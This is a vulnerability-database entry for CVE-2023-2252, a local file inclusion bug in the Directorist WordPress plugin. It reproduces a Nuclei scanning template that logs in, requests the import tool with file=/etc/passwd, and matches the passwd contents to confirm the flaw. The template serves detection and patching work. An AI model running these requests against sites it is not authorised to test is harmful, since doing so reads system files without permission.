Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2252
HistoryJul 07, 2023 - 9:38 a.m.

Directorist < 7.5.4 - Local File Inclusion

2023-07-0709:38:49
ProjectDiscovery
github.com
11
cve2023
directorist
wordpress
lfi
wpscan
wp-plugin
authenticated
validated
csv
vulnerability

2.7 Low

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

3.6 Low

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

42.3%

Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
id: CVE-2023-2252

info:
  name: Directorist < 7.5.4 - Local File Inclusion
  author: r3Y3r53
  severity: low
  description: |
    Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: Fixed in version 7.5.4
  reference:
    - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
    - https://wordpress.org/plugins/directorist/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2252
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 2.7
    cve-id: CVE-2023-2252
    cwe-id: CWE-22
    epss-score: 0.00129
    epss-percentile: 0.4773
    cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpwax
    product: directorist
    framework: wordpress
  tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402204c337ce3ced7650a1c24425481fccaa77c8acf66283da5f411e016027e99ff6302205842cc4a2f064fefdd242fc3f2ea0465de309982a6b60fc5097484163c47b3dc:922c64590222798bb761d5b6d8e72950

2.7 Low

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

3.6 Low

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

42.3%